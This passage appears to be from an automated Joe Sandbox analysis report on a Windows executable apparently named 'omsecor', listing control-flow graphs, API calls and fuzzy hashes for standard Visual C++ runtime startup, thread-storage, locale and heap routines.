                          • _strlen.LIBCMT ref: 0040253C
                          • __invoke_watson.LIBCMT ref: 00402569
                          • _strcat_s.LIBCMT ref: 0040257C
                          • __invoke_watson.LIBCMT ref: 0040258D
                          • _strcat_s.LIBCMT ref: 0040259E
                          • __invoke_watson.LIBCMT ref: 004025AF
                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77735E70,00000003,00402631,000000FC,0040667C,00000001,00000000,00000000,?,00403FFF,?,00000001), ref: 004025CE
                          • _strlen.LIBCMT ref: 004025EF
                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00403FFF,?,00000001,?,00403478,00000018,004093D0,0000000C,00403507,?), ref: 004025F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 1879448924-4022980321
                          • Opcode ID: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction ID: 3ad8829dabe9c8e6b7970468b651ade891dcb41a26c93daa50347fadcc2e15d8
                          • Opcode Fuzzy Hash: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction Fuzzy Hash: CF3127B2A402153AE62136326F5EF2F314C9B91315F14013BFE09B26D6FABD9A1441FE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 162 401e76-401e86 GetModuleHandleA 163 401e91-401ed9 GetProcAddress * 4 162->163 164 401e88-401e90 call 401bca 162->164 166 401ef1-401f10 163->166 167 401edb-401ee2 163->167 170 401f15-401f23 TlsAlloc 166->170 167->166 169 401ee4-401eeb 167->169 169->166 171 401eed-401eef 169->171 172 401ff5 170->172 173 401f29-401f34 TlsSetValue 170->173 171->166 171->170 174 401ff7-401ff9 172->174 173->172 175 401f3a-401f89 call 402419 call 401aaa * 4 call 403378 173->175 188 401ff0 call 401bca 175->188 189 401f8b-401fa6 call 401b21 175->189 188->172 189->188 194 401fa8-401fba call 404032 189->194 194->188 197 401fbc-401fd3 call 401b21 194->197 197->188 201 401fd5-401fee call 401c07 GetCurrentThreadId 197->201 201->174
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,004017BE), ref: 00401E7C
                          • __mtterm.LIBCMT ref: 00401E88
                            • Part of subcall function 00401BCA: TlsFree.KERNEL32(00000002,00401FF5), ref: 00401BF5
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004033DC
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000002), ref: 00403406
                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00401E9E
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00401EAB
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00401EB8
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00401EC5
                          • TlsAlloc.KERNEL32 ref: 00401F15
                          • TlsSetValue.KERNEL32(00000000), ref: 00401F30
                          • __init_pointers.LIBCMT ref: 00401F3A
                          • __calloc_crt.LIBCMT ref: 00401FAF
                          • GetCurrentThreadId.KERNEL32 ref: 00401FDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 2125014093-3819984048
                          • Opcode ID: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction ID: 2b6f412a48510a2ea5e28321b190ff4220801d9e6bfc04da0c4d4af9d52f3434
                          • Opcode Fuzzy Hash: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction Fuzzy Hash: AF318F319483029BE7146F75AF05B063AA5AF40355712053FF861B22F5EF7C8490EB5E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 204 404854-404876 call 401b18 207 40492a-404934 204->207 208 40487c-40488b LoadLibraryA 204->208 211 404936-40493c 207->211 212 4049af-4049b7 207->212 209 404891-4048a1 GetProcAddress 208->209 210 404a0a 208->210 209->210 215 4048a7-4048e9 call 401aaa GetProcAddress call 401aaa GetProcAddress call 401aaa call 4021f2 209->215 216 404a0c-404a10 210->216 211->212 217 40493e-404957 call 401b21 * 2 211->217 213 4049b9-4049c2 call 401b21 212->213 214 4049ea-4049f8 call 401b21 212->214 213->214 227 4049c4-4049cb 213->227 214->210 226 4049fa-404a08 214->226 244 4048f8-4048fc 215->244 245 4048eb-4048f5 call 404121 215->245 217->212 232 404959-40495b 217->232 226->216 227->214 237 4049cd-4049d5 227->237 232->212 236 40495d-404961 232->236 246 404963-404974 236->246 247 40497c-404988 call 402229 236->247 237->214 239 4049d7-4049e0 call 401b21 237->239 239->214 252 4049e2-4049e7 239->252 244->207 250 4048fe-404914 GetProcAddress call 401aaa 244->250 245->244 246->247 258 404976-40497a 246->258 259 404997-40499b 247->259 260 40498a-404994 call 404121 247->260 250->207 264 404916-404925 GetProcAddress call 401aaa 250->264 252->214 258->212 258->247 262 4049a6-4049ad 259->262 263 40499d-4049a4 259->263 260->259 262->214 263->214 264->207
                          APIs
                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00404881
                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040489D
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048BA
                            • Part of subcall function 00401AAA: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                            • Part of subcall function 00401AAA: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048CF
                          • __invoke_watson.LIBCMT ref: 004048F0
                            • Part of subcall function 00404121: _memset.LIBCMT ref: 004041AD
                            • Part of subcall function 00404121: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004041CB
                            • Part of subcall function 00404121: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004041D5
                            • Part of subcall function 00404121: UnhandledExceptionFilter.KERNEL32(0040B078,?,?,00000000), ref: 004041DF
                            • Part of subcall function 00404121: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004041FA
                            • Part of subcall function 00404121: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00404201
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401B21: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                            • Part of subcall function 00401B21: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00404904
                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040491C
                          • __invoke_watson.LIBCMT ref: 0040498F
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                          • API String ID: 2940365033-232180764
                          • Opcode ID: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction ID: 59fbdf2cbb2ff75c7ae2a14c3bd4fe5a66861bdf874bec260bfce3d1cd22fe51
                          • Opcode Fuzzy Hash: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction Fuzzy Hash: FD4163F1D00205AEDF10AFB59D86A6F7BA4EB94305B14083FE505F22E0DB7D9944CA5E

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                          • InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                          • __lock.LIBCMT ref: 00401C86
                          • ___addlocaleref.LIBCMT ref: 00401CA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1036688887-2843748187
                          • Opcode ID: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction ID: 560e36331183b230e08dea58ace58335192f7a528c6e8c7e040251058e5fa637
                          • Opcode Fuzzy Hash: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction Fuzzy Hash: 32113D719847019EE7209F76CA45B5ABBE4AF04348F10853FE899B62E1CB7C99418F19

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 287 402c5b-402c82 call 402f98 GetStartupInfoA 290 402c83 call 404032 287->290 291 402c88-402c8c 290->291 292 402e92 291->292 293 402c92-402ca3 291->293 295 402e95-402e9a call 402fdd 292->295 294 402cce-402cd0 293->294 296 402cd2-402cd6 294->296 297 402ca5-402cc8 294->297 299 402dd9 296->299 300 402cdc-402ce1 296->300 297->294 302 402ddb-402deb 299->302 300->299 303 402ce7-402cf9 300->303 304 402df8-402dfe 302->304 305 402ded-402df0 302->305 306 402cfb 303->306 307 402cfd-402d00 303->307 309 402e00-402e03 304->309 310 402e05-402e0c 304->310 305->304 308 402df2-402df6 305->308 306->307 311 402d54-402d5a 307->311 314 402e6a-402e6e 308->314 315 402e0f-402e1b GetStdHandle 309->315 310->315 312 402d02-402d04 311->312 313 402d5c 311->313 316 402d06 call 404032 312->316 317 402d64-402d6a 313->317 314->302 318 402e74-402e82 SetHandleCount 314->318 319 402e60-402e64 315->319 320 402e1d-402e1f 315->320 321 402d0b-402d0f 316->321 317->299 322 402d6c-402d74 317->322 318->295 319->314 320->319 323 402e21-402e2a GetFileType 320->323 324 402d11-402d27 321->324 325 402d5e 321->325 326 402d76-402d79 322->326 327 402dcc-402dd7 322->327 323->319 328 402e2c-402e36 323->328 329 402d4f-402d51 324->329 325->317 326->327 330 402d7b-402d7f 326->330 327->299 327->322 331 402e38-402e3c 328->331 332 402e3e-402e41 328->332 335 402d53 329->335 336 402d29-402d49 329->336 330->327 337 402d81-402d83 330->337 333 402e47-402e4f 331->333 332->333 334 402e43 332->334 338 402e50 call 404763 333->338 334->333 335->311 336->329 339 402d90-402db9 337->339 340 402d85-402d8e GetFileType 337->340 342 402e55-402e59 338->342 341 402dba call 404763 339->341 340->327 340->339 343 402dbf-402dc3 341->343 342->292 344 402e5b-402e5e 342->344 343->292 345 402dc9 343->345 344->314 345->327
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 00402C70
                          • __calloc_crt.LIBCMT ref: 00402C83
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                          • __calloc_crt.LIBCMT ref: 00402D06
                          • GetFileType.KERNEL32(00000038), ref: 00402D86
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402DBA
                          • GetStdHandle.KERNEL32(-000000F6), ref: 00402E10
                          • GetFileType.KERNEL32(00000000), ref: 00402E22
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402E50
                          • SetHandleCount.KERNEL32 ref: 00402E7A
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                          • String ID:
                          • API String ID: 1318386821-0
                          • Opcode ID: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction ID: b2392c38ea11d8206f0d28861f948c6360aed0bed67f1e2b59f3cb23873ff797
                          • Opcode Fuzzy Hash: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction Fuzzy Hash: 366136715447518ED7248B38CB4C7167BA0EF02324F29437BD9A5BB2E1D7B89806CB9D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 346 403bd3-403bfa call 403b59 349 403c0a-403c0d 346->349 350 403bfc-403c05 call 403854 346->350 352 403c0f-403c15 349->352 358 403d9d-403da4 350->358 353 403c1b-403c26 352->353 354 403cac-403cd0 call 405f60 352->354 353->352 356 403c28-403c2e 353->356 365 403cfc-403cff 354->365 359 403c34-403c3a 356->359 360 403d9a 356->360 361 403da5 call 401662 358->361 359->360 363 403c40-403c4c IsValidCodePage 359->363 360->358 364 403daa-403dab 361->364 363->360 366 403c52-403c5f GetCPInfo 363->366 367 403d01-403d11 365->367 368 403cd2-403cd7 365->368 370 403c65-403c83 call 405f60 366->370 371 403d8e-403d94 366->371 367->365 372 403d13-403d32 call 403825 367->372 368->367 369 403cd9-403cdf 368->369 373 403cf3-403cf5 369->373 380 403d81 370->380 381 403c89-403c8d 370->381 371->350 371->360 382 403d33-403d3e 372->382 376 403ce1-403cf2 373->376 377 403cf7-403cfb 373->377 376->373 377->365 383 403d84-403d8c 380->383 384 403d62-403d65 381->384 385 403c93 381->385 382->382 386 403d40-403d47 call 4038a9 382->386 383->386 387 403d6a-403d6f 384->387 388 403c96-403c9a 385->388 396 403d4c-403d51 386->396 387->387 390 403d71-403d7f call 403825 387->390 388->384 391 403ca0-403ca7 388->391 390->383 394 403d52-403d54 391->394 395 403d56-403d5c 394->395 394->396 395->384 395->388 396->394
                          APIs
                          • getSystemCP.LIBCMT ref: 00403BEC
                            • Part of subcall function 00403B59: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00403B66
                            • Part of subcall function 00403B59: GetOEMCP.KERNEL32(00000000,?,00402A85,?,?,00000001), ref: 00403B80
                          • setSBCS.LIBCMT ref: 00403BFE
                            • Part of subcall function 00403854: _memset.LIBCMT ref: 00403867
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,00409430), ref: 00403C44
                          • GetCPInfo.KERNEL32(00000000,00403F56), ref: 00403C57
                          • _memset.LIBCMT ref: 00403C6F
                          • setSBUpLow.LIBCMT ref: 00403D42
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                          • String ID:
                          • API String ID: 2658552758-0
                          • Opcode ID: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction ID: 0e9026f4e105130f7015617c44e62dc713e6d3fa9c6682f74f6de7838a23a284
                          • Opcode Fuzzy Hash: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction Fuzzy Hash: 875108319042558BDB159F25C8442BABFB8EF05306F14847FE881FF282C63CCA46DB99

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 398 401aaa-401abb TlsGetValue 399 401abd-401ac5 398->399 400 401ade-401aed GetModuleHandleA 398->400 399->400 403 401ac7-401ad4 TlsGetValue 399->403 401 401b12-401b17 400->401 402 401aef-401af6 call 401a3e 400->402 402->401 407 401af8-401afe GetProcAddress 402->407 403->400 408 401ad6-401adc 403->408 409 401b04-401b06 407->409 408->409 409->401 410 401b08-401b0e 409->410 410->401
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                          • TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: EncodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-3682587211
                          • Opcode ID: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction ID: 2de7d8fd10128b17cfc71597f2b569db04ade18300f5c4710948ea3b5a4a2571
                          • Opcode Fuzzy Hash: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction Fuzzy Hash: 68F06D307017169BD7219F25DE04A5A3AB8AF80790B16417AB844F62F4EF38DC029A6D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 412 401b21-401b32 TlsGetValue 413 401b34-401b3c 412->413 414 401b55-401b64 GetModuleHandleA 412->414 413->414 415 401b3e-401b4b TlsGetValue 413->415 416 401b66-401b6d call 401a3e 414->416 417 401b89-401b8e 414->417 415->414 422 401b4d-401b53 415->422 416->417 421 401b6f-401b75 GetProcAddress 416->421 423 401b7b-401b7d 421->423 422->423 423->417 424 401b7f-401b85 423->424 424->417
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                          • TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: DecodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-629428536
                          • Opcode ID: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction ID: 1a7e216e592b3cd04d2002f0154b272c3d781bc2d345389bf2442321812c8d59
                          • Opcode Fuzzy Hash: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction Fuzzy Hash: 96F062305013129BC7215F24DE44E6A3AB89F407947154136F854F22F0EF34DC018A6D

                          Control-flow Graph

                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction ID: 7291aa48b631972549e6df949c7a5fbc9f7bec4cf14f78cf3737268845182a7c
                          • Opcode Fuzzy Hash: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction Fuzzy Hash: C3F02E36D01705A7E720A7B4CE49B6D3134AB88765F35013BF5017B2E2CABC4D06A62D
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction ID: 38895570f31eb67b982826470c9dd1e6c230b0faa58df9c9f10e023fb9096192
                          • Opcode Fuzzy Hash: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction Fuzzy Hash: 4DF0E936E48301D7E720A7A09D49B2D3134AB44765F34053BE001BB2E1CDBC4942661F
                          APIs
                          • __lock.LIBCMT ref: 00403F82
                            • Part of subcall function 004034EE: __mtinitlocknum.LIBCMT ref: 00403502
                            • Part of subcall function 004034EE: __amsg_exit.LIBCMT ref: 0040350E
                            • Part of subcall function 004034EE: RtlEnterCriticalSection.NTDLL(?), ref: 00403516
                          • ___sbh_find_block.LIBCMT ref: 00403F8D
                          • ___sbh_free_block.LIBCMT ref: 00403F9C
                          • HeapFree.KERNEL32(00000000,?,00409450,0000000C,004034CF,00000000,004093D0,0000000C,00403507,?,?,?,00406798,00000004,00409530,0000000C), ref: 00403FCC
                          • GetLastError.KERNEL32(?,00406798,00000004,00409530,0000000C,00404045,?,?,00000000,00000000,00000000,00401CEF,00000001,00000214), ref: 00403FDD
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction ID: 478c35e85f2b107ed22a8aba67e00a0e018390ca299f0d6e226d856ee505d4b6
                          • Opcode Fuzzy Hash: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction Fuzzy Hash: AB012C71D05602AADB207FB29A0AB5E7A78DF0076AF20413FF404B61D1CB7C8A449A9D
                          APIs
                            • Part of subcall function 00401D3D: __amsg_exit.LIBCMT ref: 00401D4B
                          • __amsg_exit.LIBCMT ref: 00403A5F
                          • __lock.LIBCMT ref: 00403A6F
                          • InterlockedDecrement.KERNEL32(?), ref: 00403A8C
                          • InterlockedIncrement.KERNEL32(020E1588), ref: 00403AB7
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                          • String ID:
                          • API String ID: 4129207761-0
                          • Opcode ID: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction ID: 3b707b5fd0894213fb8e8695ce472a26b52a1803b1b57e4fe7db1faaf9775e12
                          • Opcode Fuzzy Hash: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
